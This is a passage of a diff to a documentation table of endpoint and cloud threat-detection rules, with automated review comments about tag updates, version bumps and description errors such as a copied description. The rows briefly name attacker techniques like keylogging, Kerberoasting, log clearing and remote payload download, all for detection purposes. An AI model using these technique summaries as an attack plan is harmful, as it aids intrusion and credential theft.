@@ -1276,7 +1326,7 @@ and their rule type is `machine_learning`. |<<powershell-kerberos-ticket-request, PowerShell Kerberos Ticket Request>> |Detects PowerShell scripts that have the capability of requesting kerberos tickets, which is a common step in Kerberoasting toolkits to crack service accounts. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 -|<<powershell-keylogging-script, PowerShell Keylogging Script>> |Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |109 +|<<powershell-keylogging-script, PowerShell Keylogging Script>> |Detects the use of Win32 API Functions that can be used to capture user keystrokes in PowerShell scripts. Attackers use this technique to capture user input, looking for credentials and/or other valuable data. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |110 |<<powershell-mailbox-collection-script, PowerShell Mailbox Collection Script>> |Detects PowerShell scripts that can be used to collect data from mailboxes. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |8.3.0 |5 
@@ -1284,7 +1334,7 @@ and their rule type is `machine_learning`. |<<powershell-psreflect-script, PowerShell PSReflect Script>> |Detects the use of PSReflect in PowerShell scripts. Attackers leverage PSReflect as a library that enables PowerShell to access win32 API functions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 -|<<powershell-script-block-logging-disabled, PowerShell Script Block Logging Disabled>> |Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<powershell-script-block-logging-disabled, PowerShell Script Block Logging Disabled>> |Identifies attempts to disable PowerShell Script Block Logging via registry modification. Attackers may disable this logging to conceal their activities in the host and evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<powershell-script-with-archive-compression-capabilities, PowerShell Script with Archive Compression Capabilities>> |Identifies the use of Cmdlets and methods related to archive compression activities. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |3 
@@ -1294,21 +1344,21 @@ and their rule type is `machine_learning`. |<<powershell-script-with-log-clear-capabilities, PowerShell Script with Log Clear Capabilities>> |Identifies the use of Cmdlets and methods related to Windows event log deletion activities. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |2 -|<<powershell-script-with-password-policy-discovery-capabilities, PowerShell Script with Password Policy Discovery Capabilities>> |Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |1 +|<<powershell-script-with-password-policy-discovery-capabilities, PowerShell Script with Password Policy Discovery Capabilities>> |Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Execution], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |2 -|<<powershell-script-with-remote-execution-capabilities-via-winrm, PowerShell Script with Remote Execution Capabilities via WinRM>> |Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |2 +|<<powershell-script-with-remote-execution-capabilities-via-winrm, PowerShell Script with Remote Execution Capabilities via WinRM>> |Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Execution], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |3 |<<powershell-script-with-token-impersonation-capabilities, PowerShell Script with Token Impersonation Capabilities>> |Detects scripts that contain PowerShell functions, structures, or Windows API functions related to token impersonation/theft. Attackers may duplicate then impersonate another user's token to escalate privileges and bypass access controls. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: PowerShell Logs] |8.3.0 |8 |<<powershell-script-with-webcam-video-capture-capabilities, PowerShell Script with Webcam Video Capture Capabilities>> |Detects PowerShell scripts that can be used to record webcam video. Attackers can capture this information to extort or spy on victims. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: PowerShell Logs], [Rule Type: BBR] |8.3.0 |1 -|<<powershell-share-enumeration-script, PowerShell Share Enumeration Script>> |Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |6 +|<<powershell-share-enumeration-script, PowerShell Share Enumeration Script>> |Detects scripts that contain PowerShell functions, structures, or Windows API functions related to windows share enumeration activities. Attackers, mainly ransomware groups, commonly identify and inspect network shares, looking for critical information for encryption and/or exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |7 -|<<powershell-suspicious-discovery-related-windows-api-functions, PowerShell Suspicious Discovery Related Windows API Functions>> |This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |109 +|<<powershell-suspicious-discovery-related-windows-api-functions, PowerShell Suspicious Discovery Related Windows API Functions>> |This rule detects the use of discovery-related Windows API functions in PowerShell Scripts. Attackers can use these functions to perform various situational awareness related activities, like enumerating users, shares, sessions, domain trusts, groups, etc. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Collection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |110 |<<powershell-suspicious-payload-encoded-and-compressed, PowerShell Suspicious Payload Encoded and Compressed>> |Identifies the use of .NET functionality for decompression and base64 decoding combined in PowerShell scripts, which malware and security tools heavily use to deobfuscate payloads and load them directly in memory to bypass defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |109 -|<<powershell-suspicious-script-with-audio-capture-capabilities, PowerShell Suspicious Script with Audio Capture Capabilities>> |Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |107 +|<<powershell-suspicious-script-with-audio-capture-capabilities, PowerShell Suspicious Script with Audio Capture Capabilities>> |Detects PowerShell scripts that can record audio, a common feature in popular post-exploitation tooling. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 |<<powershell-suspicious-script-with-clipboard-retrieval-capabilities, PowerShell Suspicious Script with Clipboard Retrieval Capabilities>> |Detects PowerShell scripts that can get the contents of the clipboard, which attackers can abuse to retrieve sensitive information like credentials, messages, etc. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: PowerShell Logs], [Resources: Investigation Guide] |8.3.0 |6 
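Review bot: The "PowerShell Script with Password Policy Discovery Capabilities" row, both the removed version 1 and the added version 2, carries the description of a different rule: "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools." is word-for-word the text of the "PowerShell Script with Remote Execution Capabilities via WinRM" row two entries below. The added row only appends [Tactic: Execution] and bumps the version, so the copy-paste error survives the update; the description should instead say what this rule matches (cmdlets and methods used to read domain or local password policy settings) and why an attacker would run them (planning password spraying or brute force within lockout limits). The fix belongs in the rule's description field so the generated docs inherit it.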
@@ -1342,11 +1392,11 @@ and their rule type is `machine_learning`. |<<process-injection-prevented-elastic-endgame, Process Injection - Prevented - Elastic Endgame>> |Elastic Endgame prevented Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Privilege Escalation] |8.3.0 |101 -|<<process-injection-by-the-microsoft-build-engine, Process Injection by the Microsoft Build Engine>> |An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Sysmon Only] |8.3.0 |104 +|<<process-injection-by-the-microsoft-build-engine, Process Injection by the Microsoft Build Engine>> |An instance of MSBuild, the Microsoft Build Engine, created a thread in another process. This technique is sometimes used to evade detection or elevate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Data Source: Sysmon Only] |8.3.0 |105 -|<<process-started-from-process-id-pid-file, Process Started from Process ID (PID) File>> |Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<process-started-from-process-id-pid-file, Process Started from Process ID (PID) File>> |Identifies a new process starting from a process ID (PID), lock or reboot file within the temporary file storage paradigm (tmpfs) directory /var/run directory. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<process-termination-followed-by-deletion, Process Termination followed by Deletion>> |Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<process-termination-followed-by-deletion, Process Termination followed by Deletion>> |Identifies a process termination event quickly followed by the deletion of its executable file. Malware tools and other non-native files dropped or created on a system by an adversary may leave traces to indicate to what occurred. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<processes-with-trailing-spaces, Processes with Trailing Spaces>> |Identify instances where adversaries include trailing space characters to mimic regular files, disguising their activity to evade default file handling mechanisms. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 
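Review bot: Two wording defects are carried unchanged into the bumped rows in this hunk. In "Process Started from Process ID (PID) File" (version 107), "within the temporary file storage paradigm (tmpfs) directory /var/run directory" repeats "directory"; "within the temporary file storage (tmpfs) directory /var/run" reads cleanly. In "Process Termination followed by Deletion" (version 107), "may leave traces to indicate to what occurred" should be "may leave traces that indicate what occurred". Both are description-field fixes in the rule sources rather than edits to the generated table.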
@@ -1356,7 +1406,7 @@ and their rule type is `machine_learning`. |<<proxychains-activity, ProxyChains Activity>> |This rule monitors for the execution of the ProxyChains utility. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<psexec-network-connection, PsExec Network Connection>> |Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<psexec-network-connection, PsExec Network Connection>> |Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 |<<python-script-execution-via-command-line, Python Script Execution via Command Line>> |Identifies when a Python script is executed using command line input and imports the sys module. Attackers often use this method to execute malicious scripts and avoiding writing it to disk. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |None |1 
@@ -1364,7 +1414,7 @@ and their rule type is `machine_learning`. |<<rdp-remote-desktop-protocol-from-the-internet, RDP (Remote Desktop Protocol) from the Internet>> |This rule detects network events that may indicate the use of RDP traffic from the Internet. RDP is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |103 -|<<rdp-enabled-via-registry, RDP Enabled via Registry>> |Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<rdp-enabled-via-registry, RDP Enabled via Registry>> |Identifies registry write modifications to enable Remote Desktop Protocol (RDP) access. This could be indicative of adversary lateral movement preparation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<rpc-remote-procedure-call-from-the-internet, RPC (Remote Procedure Call) from the Internet>> |This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. 
|[Tactic: Initial Access], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |103 
@@ -1374,19 +1424,19 @@ and their rule type is `machine_learning`. |<<ransomware-prevented-elastic-endgame, Ransomware - Prevented - Elastic Endgame>> |Elastic Endgame prevented ransomware. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame] |8.3.0 |101 -|<<rare-aws-error-code, Rare AWS Error Code>> |A machine learning job detected an unusual error in a CloudTrail message. These can be byproducts of attempted or successful persistence, privilege escalation, defense evasion, discovery, lateral movement, or collection. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.3.0 |107 +|<<rare-aws-error-code, Rare AWS Error Code>> |A machine learning job detected an unusual error in a CloudTrail message. These can be byproducts of attempted or successful persistence, privilege escalation, defense evasion, discovery, lateral movement, or collection. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Rule Type: ML], [Rule Type: Machine Learning], [Resources: Investigation Guide] |8.9.0 |208 |<<rare-user-logon, Rare User Logon>> |A machine learning job found an unusual user name in the authentication logs. An unusual user name is one way of detecting credentialed access by means of a new or dormant user account. An inactive user account (because the user has left the organization) that becomes active may be due to credentialed access using a compromised account password. Threat actors will sometimes also create new users as a means of persisting in a compromised web application. 
|[Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Initial Access], [Resources: Investigation Guide] |8.3.0 |104 -|<<registry-persistence-via-appcert-dll, Registry Persistence via AppCert DLL>> |Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<registry-persistence-via-appcert-dll, Registry Persistence via AppCert DLL>> |Detects attempts to maintain persistence by creating registry keys using AppCert DLLs. AppCert DLLs are loaded by every process using the common API functions to create processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<registry-persistence-via-appinit-dll, Registry Persistence via AppInit DLL>> |AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<registry-persistence-via-appinit-dll, Registry Persistence via AppInit DLL>> |AppInit DLLs are dynamic-link libraries (DLLs) that are loaded into every process that creates a user interface (loads user32.dll) on Microsoft Windows operating systems. The AppInit DLL mechanism is used to load custom code into user-mode processes, allowing for the customization of the user interface and the behavior of Windows-based applications. Attackers who add those DLLs to the registry locations can execute code with elevated privileges, similar to process injection, and provide a solid and constant persistence on the machine. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<remote-computer-account-dnshostname-update, Remote Computer Account DnsHostName Update>> |Identifies the remote update to a computer account's DnsHostName attribute. If the new value set is a valid domain controller DNS hostname and the subject computer name is not a domain controller, then it's highly likely a preparation step to exploit CVE-2022-26923 in an attempt to elevate privileges from a standard domain user to domain admin privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Use Case: Vulnerability] |8.3.0 |107 |<<remote-desktop-enabled-in-windows-firewall-by-netsh, Remote Desktop Enabled in Windows Firewall by Netsh>> |Identifies use of the network shell utility (netsh.exe) to enable inbound Remote Desktop Protocol (RDP) connections in the Windows Firewall. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<remote-execution-via-file-shares, Remote Execution via File Shares>> |Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<remote-execution-via-file-shares, Remote Execution via File Shares>> |Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<remote-file-copy-to-a-hidden-share, Remote File Copy to a Hidden Share>> |Identifies a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 
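Review bot: The "Rare AWS Error Code" row changes the minimum stack version from 8.3.0 to 8.9.0 and the rule version from 107 to 208, while its description and tags are unchanged; every other row in this hunk is a tag addition with a single-step version bump. Please confirm the 8.9.0 minimum is intended and call it out in the downloadable updates description that this commit also edits, because deployments below 8.9.0 will stay on version 107 and will not see this update offered.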
@@ -1400,7 +1450,7 @@ and their rule type is `machine_learning`. |<<remote-file-download-via-powershell, Remote File Download via PowerShell>> |Identifies powershell.exe being used to download an executable file from an untrusted remote destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<remote-file-download-via-script-interpreter, Remote File Download via Script Interpreter>> |Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<remote-file-download-via-script-interpreter, Remote File Download via Script Interpreter>> |Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<remote-logon-followed-by-scheduled-task-creation, Remote Logon followed by Scheduled Task Creation>> |Identifies a remote logon followed by a scheduled task creation on the target host. This could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement] |8.3.0 |6 
@@ -1412,6 +1462,8 @@ and their rule type is `machine_learning`. |<<remote-windows-service-installed, Remote Windows Service Installed>> |Identifies a network logon followed by Windows service creation with same LogonId. This could be indicative of lateral movement, but will be noisy if commonly done by administrators." |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence] |8.3.0 |6 +|<<remote-xsl-script-execution-via-com, Remote XSL Script Execution via COM>> |Identifies the execution of a hosted XSL script using the Microsoft.XMLDOM COM interface via Microsoft Office processes. This behavior may indicate adversarial activity to execute malicious JScript or VBScript on the system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + |<<remotely-started-services-via-rpc, Remotely Started Services via RPC>> |Identifies remote execution of Windows services over remote procedure call (RPC). This could be indicative of lateral movement, but will be noisy if commonly done by administrators." |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 |<<renamed-autoit-scripts-interpreter, Renamed AutoIt Scripts Interpreter>> |Identifies a suspicious AutoIt process execution. Malware written as an AutoIt script tends to rename the AutoIt executable to avoid detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 
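Review bot: The new "Remote XSL Script Execution via COM" row is followed by an added empty line (the second of the two `+` lines in this hunk, which is why the header counts 6 lines becoming 8); the rest of the table places rows directly one after another, so the blank line should be dropped for consistency. Separately, the unchanged "Remote Windows Service Installed" and "Remotely Started Services via RPC" context rows both end their descriptions with a stray trailing double quote after "administrators." ; that is pre-existing, but worth a follow-up fix in those rules' description fields.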
@@ -1426,7 +1478,7 @@ and their rule type is `machine_learning`. |<<smtp-on-port-26-tcp, SMTP on Port 26/TCP>> |This rule detects events that may indicate use of SMTP on TCP port 26. This port is commonly used by several popular mail transfer agents to deconflict with the default SMTP port 25. This port has also been used by a malware family called BadPatch for command and control of Windows systems. |[Tactic: Command and Control], [Domain: Endpoint], [Use Case: Threat Detection] |8.3.0 |103 -|<<ssh-authorized-keys-file-modification, SSH Authorized Keys File Modification>> |The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 +|<<ssh-authorized-keys-file-modification, SSH Authorized Keys File Modification>> |The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence], [Data Source: Elastic Defend] |8.6.0 |204 |<<ssh-authorized-keys-file-modified-inside-a-container, SSH Authorized Keys File Modified Inside a Container>> |This rule detects the creation or modification of an authorized_keys or sshd_config file inside a container. The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s). 
Unexpected and unauthorized SSH usage inside a container can be an indicator of compromise and should be investigated. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Lateral Movement] |8.8.0 |2 
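Review bot: The "SSH Authorized Keys File Modification" row raises the minimum stack version from 8.3.0 to 8.6.0 and bumps the rule version from 104 to 204, but nothing in the row says what changed; make sure the rule page and the downloadable updates description mentioned in the commit message call out the new 8.6.0 requirement, since deployments on 8.3 to 8.5 will no longer receive updates for this rule.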
@@ -1434,15 +1486,15 @@ and their rule type is `machine_learning`. |<<ssh-process-launched-from-inside-a-container, SSH Process Launched From Inside A Container>> |This rule detects an SSH or SSHD process executed from inside a container. This includes both the client ssh binary and server ssh daemon process. SSH usage inside a container should be avoided and monitored closely when necessary. With valid credentials an attacker may move laterally to other containers or to the underlying host through container breakout. They may also use valid SSH credentials as a persistence mechanism. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Persistence] |8.8.0 |2 -|<<suid-sguid-enumeration-detected, SUID/SGUID Enumeration Detected>> |This rule monitors for the usage of the "find" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |2 +|<<suid-sguid-enumeration-detected, SUID/SGUID Enumeration Detected>> |This rule monitors for the usage of the "find" command in conjunction with SUID and SGUID permission arguments. SUID (Set User ID) and SGID (Set Group ID) are special permissions in Linux that allow a program to execute with the privileges of the file owner or group, respectively, rather than the privileges of the user running the program. 
In case an attacker is able to enumerate and find a binary that is misconfigured, they might be able to leverage this misconfiguration to escalate privileges by exploiting vulnerabilities or built-in features in the privileged program. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |3 |<<sunburst-command-and-control-activity, SUNBURST Command and Control Activity>> |The malware known as SUNBURST targets the SolarWind's Orion business software for command and control. This rule detects post-exploitation command and control activity of the SUNBURST backdoor. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<scheduled-task-created-by-a-windows-script, Scheduled Task Created by a Windows Script>> |A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<scheduled-task-created-by-a-windows-script, Scheduled Task Created by a Windows Script>> |A scheduled task was created by a Windows script via cscript.exe, wscript.exe or powershell.exe. This can be abused by an adversary to establish persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat 